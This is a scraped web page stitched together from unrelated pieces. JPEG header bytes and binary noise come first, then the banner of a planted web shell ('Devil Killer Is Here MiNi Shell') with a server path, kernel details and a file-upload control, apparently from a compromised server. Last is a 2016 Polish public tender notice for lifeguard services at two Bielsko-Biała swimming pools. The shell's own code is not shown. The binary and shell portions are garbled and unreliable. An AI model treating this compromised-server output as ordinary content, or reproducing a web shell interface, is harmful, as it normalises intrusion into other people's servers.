JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160407/35843-N-2016.html

<p class="kh_header"><b>Bielsko-Biała: Obsługa ratownicza Pływalni Panorama 
przy ul. M. Konopnickiej 5 w Bielsku-Białej 
oraz Pływalni Start przy ul. Startowej 36 w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 35843 - 2016; data zamieszczenia: 07.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bielsko-Bialski Ośrodek Sportu i Rekreacji , ul. M. Konopnickiej 5, 43-300 Bielsko-Biała, woj. śląskie, tel. 33 8221875, faks 33 8221875.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bbosir.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa ratownicza Pływalni Panorama 
przy ul. M. Konopnickiej 5 w Bielsku-Białej 
oraz Pływalni Start przy ul. Startowej 36 w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1.   Przedmiotem zamówienia są usługi w zakresie ratownictwa wodnego, które muszą być świadczone w szczególności zgodnie z obowiązującymi przepisami w zakresach określonych:
a)	Ustawą z dnia 18 sierpnia 2011r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. 2011 nr 208, poz. 1240).
b)	Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz. U. 2012 nr 0, poz. 108).
c)	Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 27 lutego 2012r. w sprawie wymagań dotyczących wyposażenia obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne, (Dz. U. 2012 nr 0, poz. 261).
d)	oraz innymi obowiązującymi Rozporządzeniami. 
2.	Wymiary niecek basenowych na poszczególnych pływalniach:
- Pływalnia Panorama dysponuje dwoma nieckami: jedna niecka 50 x 25 m, druga niecka 50x30 m
- Pływalnia Start dysponuje dwoma nieckami: jedna niecka 50x20 m, druga niecka 59x33 m oraz brodzikiem dla dzieci.
3.	Świadczenie usług ratownictwa wodnego będzie się odbywać z uwzględnieniem podanych niżej warunków:
1)	Wykonawca starający się o realizację zamówienia na obsługę ratowniczą Pływalni Panorama ul. M. Konopnickiej 5 w Bielsku-Białej oraz Pływalni Start ul. Startowa 36 Bielsku-Białej musi spełniać w szczególności następujące wymagania:
a)	Dysponować odpowiednim potencjałem technicznym i osobowym tj. odpowiednią ilością osób, posiadających aktualne kwalifikacje ratownicze oraz wiedzę i doświadczenie umożliwiające wykonanie zamówienia. Osoby wykonujące usługi z ramienia Wykonawcy muszą posiadać aktualne (zweryfikowane) uprawnienia do pracy w charakterze ratownika wodnego, aktualne badania lekarskie potwierdzające zdolność do wykonywania pracy na stanowisku ratownika wodnego oraz będą przeszkolone w zakresie przepisów BHP i p.poż.
b)	Wziąć pełną odpowiedzialność za zatrudnienie odpowiedniej ilości ratowników wodnych w czasie godzin otwarcia pływalni oraz posiadania przez nich niezbędnych kwalifikacji do pracy, a także za zabezpieczenie pływalni w sytuacji absencji zatrudnianych ratowników bez względu na przyczynę ich absencji.
c)	Ponosić pełną odpowiedzialność za bezpieczeństwo osób przebywających na terenie pływalni ze szczególnym uwzględnieniem strefy mokrej w czasie pełnienia obowiązków ratowniczych, organizując we właściwy sposób pracę załogi ratowniczej. W przypadku zgłoszenia jakichkolwiek roszczeń przez osoby trzecie, tytułem nieprawidłowej realizacji umowy przez ratowników, którym Wykonawca powierzył wykonanie usługi, Wykonawca zobowiązuje się we własnym zakresie do pokrycia wynikających roszczeń. 
d)	Ponosić pełną odpowiedzialność za pracę ratowników, którym powierzy wykonanie usługi.
e)	Odpowiadać za całość zagadnień organizacyjnych, finansowo-księgowych oraz kadrowych związanych z zatrudnieniem ratowników.
f)	Odpowiadać za planowanie pracy przez zatrudnionych przez siebie ratowników poprzez przygotowywanie grafików zmian.
g)	Nadzorować przez wytypowanych imiennie Starszych Ratowników (kierowników zmiany), właściwego wypełniania przepisów obowiązujących służby ratownicze na pływalniach w zakresach określonych odpowiednimi przepisami prawa. 
h)	Ratownicy wykonujący niniejsze zamówienie nie będą podejmować żadnej działalności gospodarczej w miejscu i czasie świadczenia usług na rzecz Bielsko-Bialskiego Ośrodka Sportu i Rekreacji. 
i)	Przebywanie na terenie pływalni poza godzinami pracy (dyżuru) jest możliwe tylko w uzasadnionych przypadkach po uzyskaniu zgody dyrektora BBOSiR lub kierownika obiektu. Z pomieszczeń przekazanych na potrzeby wykonywania umowy mogą korzystać tylko te osoby, które będą na aktualnym grafiku pracy.
2)	Do zakresu obowiązków ratowników wodnych zatrudnionych przez Wykonawcę w szczególności należeć będzie :
a)	Zapobieganie wszelkim szkodom materialnym wyrządzonym w obrębie niecek basenowych przez użytkowników odkrytych pływalni. W sytuacji zaistnienia takich szkód, fakt ten musi byś natychmiast zgłoszony do Zamawiającego i kierownika obiektu. 
b)	Samodzielne prowadzenie stosownej dokumentacji na poszczególnym obiekcie tj. dziennika pracy ratowników z wpisami dotyczącymi przebiegu pracy na każdej zmianie.
c)	Sprawdzenie przed otwarciem pływalni stanu technicznego urządzeń, zjeżdżalni i sprzętu ratowniczego będącego na wyposażeniu obiektów, a w przypadku zauważonych nieprawidłowości lub uszkodzeń, zgłoszenie powyższego faktu kierownikowi/gospodarzowi obiektu lub pełniącemu zmianę konserwatorowi z wpisem do dziennika pracy.
d)	Zapewnienie warunków bezpieczeństwa osób kapiących się i korzystających z atrakcji wodnych.
e)	Obsługa i bieżące monitorowanie stanu urządzeń rekreacyjnych (masaże, gejzery, armatki wodne, sztuczna rzeka itp.) oraz zjeżdżalni.
f)	Stałe usuwanie zanieczyszczeń (liście, śmieci, szkło itp.) z lustra wody, niecki 
oraz z urządzeń rekreacyjnych znajdujących się w nieckach basenowych każdego dnia przed otwarciem pływalni oraz w ciągu dnia w trakcie wykonywania obsługi ratowniczej.
g)	Pełnienie dyżuru na wyznaczonych stanowiskach ratowniczych. 
h)	Bezwzględne nie pozostawianie  niecki basenowej bez dozoru.
i)	Stała obserwacja lustra wody oraz reagowanie na każdy sygnał wzywania pomocy.
j)	Sygnalizowanie za pomocą urządzeń alarmowych wszelkich przekroczeń porządku obowiązującego na pływalni, oraz pomaganie w akcji ewakuacyjnej na obiekcie zgodnie z procedurą.
k)	Organizowanie pomocy i ratowanie osób, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia.
l)	Udzielanie pierwszej pomocy przedlekarskiej w każdym zgłoszonym wypadku 
z odnotowaniem w dzienniku pracy, a w razie konieczności wezwanie pogotowia ratunkowego i sporządzenie protokołu powypadkowego.
m)	Zorganizowanie stałego punktu zdobywania kart pływackich.
n)	Kontrola i uzupełnianie stanu apteczek pierwszej pomocy.
o)	Pomoc w organizacji imprez sportowych, rekreacyjnych oraz zawodów.
p)	Udzielanie klientom wyczerpujących informacji na temat regulaminu pływalni i regulaminów korzystania ze zjeżdżalni oraz atrakcji wodnych.
q)	Nadzór nad przestrzeganiem regulaminów pływalni, zaleceń oraz stosowanie odpowiednich procedur postępowania w przypadku ich łamania lub nieprzestrzegania.
r)	Każde zdarzenie lub przypadek złamania regulaminu winno być odnotowane w dzienniku pracy ratowników. Informacja powinna również zawierać opis podjętych przez ratownika czynności wobec zaistniałego zdarzenia lub osoby naruszającej regulamin. 
s)	Dopilnowanie opuszczenia niecek basenowych i innych urządzeń przez wszystkich kąpiących się po godzinach funkcjonowania (otwarcia) pływalni oraz sprawdzenie stanu i kompletności sprzętu ratowniczego.
t)	Ratownicy przed rozpoczęciem pracy na obiekcie mają obowiązek zapoznać się 
z Regulaminem Pływalni, Instrukcją Bezpieczeństwa Pożarowego oraz Instrukcją Alarmową potwierdzając to własnoręcznym podpisem. 
u)	Dbanie o stanowisko ratownicze oraz powierzony sprzęt w szczególności przeciwdziałanie użyciu sprzętu ratowniczego niezgodnie z jego przeznaczeniem.
v)	Dbanie o dobre imię Zamawiającego oraz Wykonawcy. 
w)	Współdziałanie z innymi pracownikami obiektu w zakresie jego właściwego funkcjonowania  i eksploatacji.
4. Inne uwarunkowania
a)	Ilość ratowników: 
- W czasie otwarcia Pływalni Panorama na jednej zmianie musi pracować min. 4 ratowników wodnych (zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego) pełniących dyżur na wyznaczonych stanowiskach ratowniczych. 
- W czasie otwarcia Pływalni Start na jednej zmianie musi pracować min. 6 ratowników wodnych (zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego) pełniących dyżur na wyznaczonych stanowiskach ratowniczych. 
b)	Zapewnienie przez Wykonawcę oraz dopilnowanie noszenia odpowiedniego stroju tj. koszulki 
z napisem Ratownik oraz spodenek kąpielowych w aktualnie obowiązującym kolorze. 
c)	Wykonawca odpowiada wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu oraz/lub osobom trzecim przez osoby zatrudnione przez Wykonawcę.
d)	Wykonawca odpowiada za wypadki, kontuzje (itp. zdarzenia) ratowników, którym powierzył wykonanie usługi, nie wynikające z winy Zamawiającego. 
e)	Wykonawca prowadził będzie stosowną dokumentację tj. dziennik pracy ratowników z wpisami dotyczącymi przebiegu pracy na każdej zmianie, do której strony będą wpisywały wszelkie uwagi oraz istotne wydarzenia związane z realizacją przedmiotu umowy. Dziennik pracy Wykonawca będzie przedstawiał Zamawiającemu raz w miesiącu w celu potwierdzenia wykonanych usług. 
f)	Zamawiający zastrzega sobie możliwość ciągłego nadzoru nad świadczeniem usługi 
w zakresie przedmiotu zamówienia. Pracownik upoważniony przez Zamawiającego ma prawo 
w dzienniku pracy ratowników wpisywać uwagi dotyczące niewykonania, nienależytego wykonania lub zaniedbań w wykonaniu usługi będącej przedmiotem niniejszego zamówienia.
g)	Zamawiający wymaga aby na każdym obiekcie wyznaczony był Kierownik zespołu ratowników.  
h)	Zamawiający wymaga aby na każdej zmianie ratowników wyznaczony był Kierownik zmiany do kontaktu z Zamawiającym, a fakt ten został odnotowany w dzienniku pracy ratowników. 
i)	Wykonawca zobowiązany jest własnym staraniem i na własny koszt do bieżącego uzupełniania apteczek w punktach pierwszej pomocy obsługiwanych przez ratowników na pływalniach w sprzęt medyczny, leki, artykuły sanitarne wymagane Rozporządzeniem Ministra Spraw Wewnętrznych 
z dnia 27 lutego 2012r. w sprawie wymagań dotyczących wyposażenia obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne i ostrzegawcze oraz sprzęt medyczny, leki 
i artykuły sanitarne. 
j)	Dołączony wraz ofertą wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (stanowiący załącznik nr 7 do SIWZ) będzie stanowił nieodłączny element umowy. Wykonawca zobowiązany jest realizować na rzecz Zamawiającego usługi ratownicze osobami przedstawionymi w wykazie osób stanowiącym załącznik nr 7 do SIWZ. Zamawiający zastrzega sobie prawo do weryfikacji osób z wykazu z przedstawionym grafikiem zmian przedstawionym przez Wykonawcę. 
k)	Osoby uczestniczące w wykonywaniu zamówienia z ramienia Wykonawcy wskazane w zał. nr 7 
do SIWZ muszą posiadać uprawnienia / kwalifikacje zawodowe (ratownika wodnego). Wykonawca 
w dniu podpisania umowy zobowiązany jest dostarczyć kserokopie stron potwierdzające:
- przynależność członkowską do podmiotu uprawnionego;
- zdobyty stopień ratownika wodnego/WOPR;
- ukończony kurs kwalifikowanej pierwszej pomocy. 
l)	Koordynowanie prac realizowanych przez podwykonawców..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.00.00-3, 75.25.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem uczestnictwa w przetargu jest wniesienie wadium na rzecz Bielsko - Bialskiego Ośrodka Sportu i Rekreacji, 43-300 Bielsko - Biała, ul. M. Konopnickiej 5, w wysokości 5.000,00zł, (słownie: pięć tysięcy złotych 00/100), przed upływem terminu składania ofert. 
Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania o udzielenie zamówienia. 
2.	Wadium może być wniesione w jednej lub kilku następujących formach: 
a)	pieniądzu; 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c)	gwarancjach bankowych; 
d)	gwarancjach ubezpieczeniowych; 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2014r., poz.1804 oraz z 2015r., poz. 978 i 1240). 
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem (wyłącza się możliwość wniesienia wadium w gotówce) na rachunek bankowy Bielsko-Bialskiego Ośrodka Sportu i Rekreacji w Banku Pekao S.A. Oddział w Bielsku-Białej, nr konta 49 1240 4142 1111 0000 4828 1489, z podaniem tytułu: wadium - przetarg na obsługę ratowniczą 
Uwaga! -przy wnoszeniu wadium przelewem, dokument polecenia dokonania przelewu nie jest dowodem wniesienia wadium. 
Dokumentem potwierdzającym dokonanie wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego (wpływ środków na rachunek Zamawiającego przed upływem terminu składania ofert). 
4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
5.	Wadium wniesione w pieniądzu, Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunku bankowym wskazanym przez Wykonawcę.  
6.	Wadium w innej formie niż pieniądz (gwarancja, poręczenie) należy złożyć w formie oryginału w Dziale Głównego Księgowego Bielsko-Bialskiego Ośrodka Sportu i Rekreacji w Bielsku-Białej, ul. M. Konopnickiej 5 a kserokopię potwierdzoną za zgodność z oryginałem przez osobę/y uprawnioną/e do składania oświadczeń woli w imieniu Wykonawcy winna być dołączona do oferty. 
Uwaga! -termin ważności gwarancji nie może być krótszy niż termin związania ofertą.
7.	W treści gwarancji/poręczenia musi znajdować się zapis, iż Gwarant/poręczyciel zobowiązuje się do nieodwołalnej, bezwarunkowej i płatnej na pierwsze żądanie Bielsko-Bialskiego Ośrodka Sportu i Rekreacji wypłaty kwoty wadium w wysokości 5.000,00 zł. w terminie związania ofertą. 
W gwarancji/poręczeniu winien być także zapis, iż wypłata gwarancji/poręczenia powstaje gdy: Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej a także w przypadkach gdy Wykonawca: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy oraz powinno podlegać prawu polskiemu i być realizowana w Polsce. Zamawiający nie wyraża zgody, aby żądanie zapłaty musiało być przekazane za pośrednictwem banku prowadzącego rachunek beneficjenta gwarancji lub jakiegokolwiek innego banku. Wadium w postaci dokumentu winno zawierać oznaczenie postępowania którego dotyczy.
8.	Zamawiający nie wyraża zgody na wnoszenie wadium ani na uzupełnienie wadium po terminie składania oferty.
9.	W przypadku wadium w formie gwarancji lub poręczenia wnoszonego przez Wykonawców występujących wspólnie (np. spółka cywilna, konsorcjum) zaleca się aby z treści gwarancji lub poręczenia wynikało, że wadium to dotyczy wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia. 
10.	Zamawiający zwraca wadium: 
a)	wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza (z zastrzeżeniem art. 46 ust. 4a ustawy Pzp); 
b)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienie żądano. 
c)	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
11.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie; 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać (potwierdzić), że:
1.1)	Posiada decyzję wydaną przez Ministra Spraw Wewnętrznych wyrażającą zgodę na wykonywanie ratownictwa wodnego na podstawie ustawy z dnia 18 sierpnia 2011r. o bezpieczeństwie osób przebywających na obszarze wodnym. 
Z decyzji jednoznacznie musi wynikać, ze Wykonawca może wykonywać ratownictwo wodne.

Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt. 2.1 i 2.6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać (potwierdzić), że:
2.1) Posiada wiedzę i doświadczenie przedstawiając wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, głównych usług, w okresie ostatnich trzech (3) lat przed upływem terminu skłania ofert - za spełnienie warunku Zamawiający uzna  wykazanie się minimum dwiema usługami o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. w zakresie świadczenie usługi ochrony ratowniczej na pływalni odkrytej, posiadającej powierzchnię lustra wody minimum 2500 m2, każda z usług o wartości nie mniejszej niż 150.000,00 zł. brutto (słownie: sto pięćdziesiąt tysięcy złotych brutto). 

UWAGA!
W przypadku usług będących w trakcie realizacji, powyższy warunek należy odnieść do części usługi zrealizowanej przed upływem terminu składania ofert. 
Przez jedną usługę Zamawiający rozumie jeden/ą kontrakt/umowę.

Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu 
oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale VI pkt 2 ppkt 2.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać (potwierdzić), że:
4.1) Dysponuje osobami zdolnymi do wykonania zamówienia - za spełnienie warunku Zamawiający uzna dysponowanie co najmniej dwudziestoma pięcioma (25) osobami uczestniczącymi 
w wykonaniu zamówienia posiadającymi: 
a)	aktualne uprawnienie minimum ratownika wodnego nadane przez uprawniony podmiot zgodnie z ustawą z dnia 18.08.2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. 2011r., nr 208, poz.1240) oraz aktami wykonawczymi do tejże ustawy,
b)	aktualne zaświadczenie potwierdzające ukończony kurs w zakresie kwalifikowanej pierwszej pomocy oraz uzyskania tytułu ratownika, 
c)	doświadczenie zawodowe w wykonywaniu pracy na stanowisku ratownika wodnego, 
